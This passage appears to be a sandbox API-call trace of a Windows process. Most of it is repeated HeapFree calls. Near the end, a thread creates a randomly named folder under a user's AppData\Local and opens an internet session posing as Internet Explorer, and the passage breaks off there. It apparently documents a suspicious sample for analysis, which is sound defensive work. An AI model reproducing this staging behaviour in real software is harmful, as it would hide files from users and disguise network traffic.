hHeap=0x670000) returned 1 [0112.675] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2a3a720 | out: hHeap=0x670000) returned 1 [0112.675] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x6ac588 | out: hHeap=0x670000) returned 1 [0112.676] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2afdb70 | out: hHeap=0x670000) returned 1 [0112.677] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2aa8a78 | out: hHeap=0x670000) returned 1 [0112.677] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2aa82e0 | out: hHeap=0x670000) returned 1 [0112.678] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2aa89e8 | out: hHeap=0x670000) returned 1 [0112.678] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2aa89a0 | out: hHeap=0x670000) returned 1 [0112.678] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ad4e78 | out: hHeap=0x670000) returned 1 [0112.679] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x6a7620 | out: hHeap=0x670000) returned 1 [0112.679] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ab0440 | out: hHeap=0x670000) returned 1 [0112.679] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x683268 | out: hHeap=0x670000) returned 1 [0112.679] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ae41a8 | out: hHeap=0x670000) returned 1 [0112.680] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2acc800 | out: hHeap=0x670000) returned 1 [0112.680] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2acd088 | out: hHeap=0x670000) returned 1 [0112.680] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2acd910 | out: hHeap=0x670000) returned 1 [0112.680] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ace198 | out: hHeap=0x670000) returned 1 [0112.680] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ad1d98 | out: hHeap=0x670000) returned 1 [0112.680] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2acb6f0 | out: hHeap=0x670000) returned 1 [0112.680] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b39428 | out: hHeap=0x670000) returned 1 [0112.680] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b50e00 | out: hHeap=0x670000) returned 1 [0112.680] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b55860 | out: hHeap=0x670000) returned 1 [0112.680] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b3dd48 | out: hHeap=0x670000) returned 1 [0112.681] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b3d530 | out: hHeap=0x670000) returned 1 [0112.681] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b3cd18 | out: hHeap=0x670000) returned 1 [0112.681] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b3c500 | out: hHeap=0x670000) returned 1 [0112.681] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x731f88 | out: hHeap=0x670000) returned 1 [0112.681] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b3fdb8 | out: hHeap=0x670000) returned 1 [0112.682] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b40e18 | out: hHeap=0x670000) returned 1 [0112.683] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b41650 | out: hHeap=0x670000) returned 1 [0112.683] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b41e88 | out: hHeap=0x670000) returned 1 [0112.683] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b426c0 | out: hHeap=0x670000) returned 1 [0112.684] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b43738 | out: hHeap=0x670000) returned 1 [0112.684] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b42ef8 | out: hHeap=0x670000) returned 1 [0112.684] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b405e0 | out: hHeap=0x670000) returned 1 [0112.685] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b447c8 | out: hHeap=0x670000) returned 1 [0112.685] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b45860 | out: hHeap=0x670000) returned 1 [0112.685] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b460b8 | out: hHeap=0x670000) returned 1 [0112.685] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b43f80 | out: hHeap=0x670000) returned 1 [0112.686] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b45010 | out: hHeap=0x670000) returned 1 [0112.686] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b47150 | out: hHeap=0x670000) returned 1 [0112.687] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b481e0 | out: hHeap=0x670000) returned 1 [0112.687] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b47998 | out: hHeap=0x670000) returned 1 [0112.687] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b48a28 | out: hHeap=0x670000) returned 1 [0112.688] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b49260 | out: hHeap=0x670000) returned 1 [0112.688] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b46910 | out: hHeap=0x670000) returned 1 [0112.688] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b49a98 | out: hHeap=0x670000) returned 1 [0112.688] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b4a2c0 | out: hHeap=0x670000) returned 1 [0112.688] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b4b318 | out: hHeap=0x670000) returned 1 [0112.689] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b4c388 | out: hHeap=0x670000) returned 1 [0112.689] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b4aae8 | out: hHeap=0x670000) returned 1 [0112.689] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b4cbc0 | out: hHeap=0x670000) returned 1 [0112.689] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b4dc38 | out: hHeap=0x670000) returned 1 [0112.689] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b4e490 | out: hHeap=0x670000) returned 1 [0112.689] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ad5f90 | out: hHeap=0x670000) returned 1 [0112.689] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ad6818 | out: hHeap=0x670000) returned 1 [0112.689] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b4d3e8 | out: hHeap=0x670000) returned 1 [0112.689] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b4f528 | out: hHeap=0x670000) returned 1 [0112.689] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b505b8 | out: hHeap=0x670000) returned 1 [0112.689] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b4bb50 | out: hHeap=0x670000) returned 1 [0112.689] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b4ece8 | out: hHeap=0x670000) returned 1 [0112.689] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b4fd70 | out: hHeap=0x670000) returned 1 [0112.689] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ad70a0 | out: hHeap=0x670000) returned 1 [0112.689] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x670000) returned 1 [0112.689] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ad81b0 | out: hHeap=0x670000) returned 1 [0112.690] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b51630 | out: hHeap=0x670000) returned 1 [0112.690] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b526a0 | out: hHeap=0x670000) returned 1 [0112.690] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ad8a38 | out: hHeap=0x670000) returned 1 [0112.690] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b53728 | out: hHeap=0x670000) returned 1 [0112.690] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b53f80 | out: hHeap=0x670000) returned 1 [0112.690] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ad92c0 | out: hHeap=0x670000) returned 1 [0112.690] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ad9b48 | out: hHeap=0x670000) returned 1 [0112.690] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b52ed8 | out: hHeap=0x670000) returned 1 [0112.690] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b55018 | out: hHeap=0x670000) returned 1 [0112.690] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b560a8 | out: hHeap=0x670000) returned 1 [0112.690] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b51e68 | out: hHeap=0x670000) returned 1 [0112.690] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b547d8 | out: hHeap=0x670000) returned 1 [0112.690] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2adac58 | out: hHeap=0x670000) returned 1 [0112.690] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ada3d0 | out: hHeap=0x670000) returned 1 [0112.690] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2adb4e0 | out: hHeap=0x670000) returned 1 [0112.690] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2adc5f0 | out: hHeap=0x670000) returned 1 [0112.690] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2adbd68 | out: hHeap=0x670000) returned 1 [0112.690] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ac72b0 | out: hHeap=0x670000) returned 1 [0112.690] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ac7b38 | out: hHeap=0x670000) returned 1 [0112.690] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b57a18 | out: hHeap=0x670000) returned 1 [0112.690] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b58270 | out: hHeap=0x670000) returned 1 [0112.690] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ac83c0 | out: hHeap=0x670000) returned 1 [0112.690] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ac8c48 | out: hHeap=0x670000) returned 1 [0112.690] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ac94d0 | out: hHeap=0x670000) returned 1 [0112.691] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b571c8 | out: hHeap=0x670000) returned 1 [0112.691] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ac9d58 | out: hHeap=0x670000) returned 1 [0112.691] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2aca5e0 | out: hHeap=0x670000) returned 1 [0112.691] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2acae68 | out: hHeap=0x670000) returned 1 [0112.691] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2adce78 | out: hHeap=0x670000) returned 1 [0112.691] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2acbf78 | out: hHeap=0x670000) returned 1 [0112.691] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b568f0 | out: hHeap=0x670000) returned 1 [0112.691] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b258f0 | out: hHeap=0x670000) returned 1 [0112.692] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ad1d30 | out: hHeap=0x670000) returned 1 [0112.692] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b26148 | out: hHeap=0x670000) returned 1 [0112.693] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b32f20 | out: hHeap=0x670000) returned 1 [0112.693] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2aa0708 | out: hHeap=0x670000) returned 1 [0112.694] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2a9fe10 | out: hHeap=0x670000) returned 1 [0112.694] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ae4360 | out: hHeap=0x670000) returned 1 [0112.694] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b73438 | out: hHeap=0x670000) returned 1 [0112.695] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b73cc0 | out: hHeap=0x670000) returned 1 [0112.695] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b74548 | out: hHeap=0x670000) returned 1 [0112.696] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b74dd0 | out: hHeap=0x670000) returned 1 [0112.696] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ad1e00 | out: hHeap=0x670000) returned 1 [0112.696] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b70108 | out: hHeap=0x670000) returned 1 [0112.697] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b2da58 | out: hHeap=0x670000) returned 1 [0112.697] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b2e270 | out: hHeap=0x670000) returned 1 [0112.698] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b70990 | out: hHeap=0x670000) returned 1 [0112.698] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b71218 | out: hHeap=0x670000) returned 1 [0112.698] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b71aa0 | out: hHeap=0x670000) returned 1 [0112.699] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b72328 | out: hHeap=0x670000) returned 1 [0112.699] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b72bb0 | out: hHeap=0x670000) returned 1 [0112.699] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2abcbe0 | out: hHeap=0x670000) returned 1 [0112.700] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2af3b00 | out: hHeap=0x670000) returned 1 [0112.700] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2af4388 | out: hHeap=0x670000) returned 1 [0112.700] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2af4c10 | out: hHeap=0x670000) returned 1 [0112.701] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2af5498 | out: hHeap=0x670000) returned 1 [0112.701] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2af5d20 | out: hHeap=0x670000) returned 1 [0112.701] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b5a358 | out: hHeap=0x670000) returned 1 [0112.702] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2af65a8 | out: hHeap=0x670000) returned 1 [0112.702] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2af6e30 | out: hHeap=0x670000) returned 1 [0112.702] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b39c48 | out: hHeap=0x670000) returned 1 [0112.702] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b3a490 | out: hHeap=0x670000) returned 1 [0112.703] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b3ace8 | out: hHeap=0x670000) returned 1 [0112.703] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2af76b8 | out: hHeap=0x670000) returned 1 [0112.703] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2af7f40 | out: hHeap=0x670000) returned 1 [0112.704] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b3b540 | out: hHeap=0x670000) returned 1 [0112.704] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b27ee0 | out: hHeap=0x670000) returned 1 [0112.704] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2af87c8 | out: hHeap=0x670000) returned 1 [0112.705] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2af9050 | out: hHeap=0x670000) returned 1 [0112.705] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2af98d8 | out: hHeap=0x670000) returned 1 [0112.705] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2afa160 | out: hHeap=0x670000) returned 1 [0112.706] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b5abb8 | out: hHeap=0x670000) returned 1 [0112.706] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b5b440 | out: hHeap=0x670000) returned 1 [0112.706] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b5bcc8 | out: hHeap=0x670000) returned 1 [0112.707] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b5c550 | out: hHeap=0x670000) returned 1 [0112.707] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b5cdd8 | out: hHeap=0x670000) returned 1 [0112.708] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b5d660 | out: hHeap=0x670000) returned 1 [0112.708] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b28728 | out: hHeap=0x670000) returned 1 [0112.708] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b28f80 | out: hHeap=0x670000) returned 1 [0112.709] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b5dee8 | out: hHeap=0x670000) returned 1 [0112.709] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b5e770 | out: hHeap=0x670000) returned 1 [0112.709] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b5eff8 | out: hHeap=0x670000) returned 1 [0112.709] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b297d8 | out: hHeap=0x670000) returned 1 [0112.710] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b2a020 | out: hHeap=0x670000) returned 1 [0112.710] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b5f880 | out: hHeap=0x670000) returned 1 [0112.711] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b60108 | out: hHeap=0x670000) returned 1 [0112.711] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b60990 | out: hHeap=0x670000) returned 1 [0112.712] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b61218 | out: hHeap=0x670000) returned 1 [0112.712] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b61aa0 | out: hHeap=0x670000) returned 1 [0112.713] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b62328 | out: hHeap=0x670000) returned 1 [0112.713] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b62bb0 | out: hHeap=0x670000) returned 1 [0112.713] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b63438 | out: hHeap=0x670000) returned 1 [0112.714] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b63cc0 | out: hHeap=0x670000) returned 1 [0112.714] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b2a868 | out: hHeap=0x670000) returned 1 [0112.714] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b2b0c0 | out: hHeap=0x670000) returned 1 [0112.715] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b64548 | out: hHeap=0x670000) returned 1 [0112.715] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b64dd0 | out: hHeap=0x670000) returned 1 [0112.715] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b65658 | out: hHeap=0x670000) returned 1 [0112.715] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b2b918 | out: hHeap=0x670000) returned 1 [0112.716] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b2c160 | out: hHeap=0x670000) returned 1 [0112.716] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b65ee0 | out: hHeap=0x670000) returned 1 [0112.716] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b66768 | out: hHeap=0x670000) returned 1 [0112.716] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b66ff0 | out: hHeap=0x670000) returned 1 [0112.717] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b67878 | out: hHeap=0x670000) returned 1 [0112.717] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b68100 | out: hHeap=0x670000) returned 1 [0112.717] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b68988 | out: hHeap=0x670000) returned 1 [0112.717] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b69210 | out: hHeap=0x670000) returned 1 [0112.718] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b69a98 | out: hHeap=0x670000) returned 1 [0112.720] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b6abb8 | out: hHeap=0x670000) returned 1 [0112.720] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b2c9a8 | out: hHeap=0x670000) returned 1 [0112.721] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b2d200 | out: hHeap=0x670000) returned 1 [0112.721] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b6b440 | out: hHeap=0x670000) returned 1 [0112.721] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b6bcc8 | out: hHeap=0x670000) returned 1 [0112.721] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b6c550 | out: hHeap=0x670000) returned 1 [0112.722] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b6cdd8 | out: hHeap=0x670000) returned 1 [0112.722] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b6d660 | out: hHeap=0x670000) returned 1 [0112.722] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b6dee8 | out: hHeap=0x670000) returned 1 [0112.723] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b6e770 | out: hHeap=0x670000) returned 1 [0112.723] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b6eff8 | out: hHeap=0x670000) returned 1 [0112.723] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b6f880 | out: hHeap=0x670000) returned 1 [0112.724] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b21c90 | out: hHeap=0x670000) returned 1 [0112.725] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b59b40 | out: hHeap=0x670000) returned 1 [0112.725] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ad1c60 | out: hHeap=0x670000) returned 1 [0112.726] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b58ac8 | out: hHeap=0x670000) returned 1 [0112.726] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2af3278 | out: hHeap=0x670000) returned 1 [0112.726] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b3ee58 | out: hHeap=0x670000) returned 1 [0112.727] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b3e560 | out: hHeap=0x670000) returned 1 [0112.727] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x691a78 | out: hHeap=0x670000) returned 1 [0112.729] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x690718 | out: hHeap=0x670000) returned 1 [0112.729] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0112.729] ExitProcess (uExitCode=0x0) [0112.733] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2a9fbd8 | out: hHeap=0x670000) returned 1 [0112.734] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x68f228 | out: hHeap=0x670000) returned 1 Thread: id = 65 os_tid = 0xf6c Thread: id = 66 os_tid = 0xf70 Thread: id = 67 os_tid = 0xf74 Thread: id = 68 os_tid = 0xf78 Thread: id = 69 os_tid = 0xf7c Thread: id = 70 os_tid = 0xf80 Thread: id = 71 os_tid = 0xf84 [0098.630] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x50) returned 0x2ae4200 [0098.630] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x50) returned 0x2ae4150 [0098.630] GetLastError () returned 0x54f [0098.630] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x3bc) returned 0x2b27710 [0098.631] GetCurrentThreadId () returned 0xf84 [0098.631] SetLastError (dwErrCode=0x54f) [0098.631] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x30) returned 0x2afdf98 [0098.631] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x18) returned 0x2aa9258 [0098.661] GetLastError () returned 0x54f [0098.661] SetLastError (dwErrCode=0x54f) [0098.661] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x30) returned 0x2afdf60 [0098.661] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x30) returned 0x2afdeb8 [0098.661] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2aa9258 | out: hHeap=0x670000) returned 1 [0098.661] GetLastError () returned 0x54f [0098.661] SetLastError (dwErrCode=0x54f) [0098.662] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ae4150 | out: hHeap=0x670000) returned 1 [0098.662] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75be0000 [0098.662] GetProcAddress (hModule=0x75be0000, lpProcName="SHGetFolderPathA") returned 0x75cf7804 [0098.663] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x400) returned 0x2b27ad8 [0098.663] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x2b27ad8 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x0 [0098.663] UuidCreate (in: Uuid=0x911d768 | out: Uuid=0x911d768) returned 0x0 [0098.667] UuidToStringA (in: Uuid=0x911d768, StringUuid=0x911d6c0 | out: StringUuid=0x911d6c0) returned 0x0 [0098.667] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x30) returned 0x2afe008 [0098.667] RpcStringFreeA (in: String=0x911d6c0 | out: String=0x911d6c0) returned 0x0 [0098.667] PathAppendA (in: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local", pMore="8fe7c31a-bf61-488d-a23d-baf203322e90" | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\8fe7c31a-bf61-488d-a23d-baf203322e90") returned 1 [0098.667] CreateDirectoryA (lpPathName="C:\\Users\\kEecfMwgj\\AppData\\Local\\8fe7c31a-bf61-488d-a23d-baf203322e90" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\8fe7c31a-bf61-488d-a23d-baf203322e90"), lpSecurityAttributes=0x0) returned 1 [0098.669] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x410) returned 0x2b1fb80 [0098.669] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x410) returned 0x2b1ff98 [0098.669] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x1000) returned 0x2b203b0 [0098.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b1ff98, cbMultiByte=-1, lpWideCharStr=0x2b203b0, cchWideChar=2048 | out: lpWideCharStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\8fe7c31a-bf61-488d-a23d-baf203322e90") returned 70 [0098.669] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x1010) returned 0x2b213b8 [0098.669] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b203b0 | out: hHeap=0x670000) returned 1 [0098.670] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b1ff98 | out: hHeap=0x670000) returned 1 [0098.670] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x18) returned 0x2aa91d8 [0098.670] InternetOpenA (lpszAgent="Microsoft Internet Explorer", 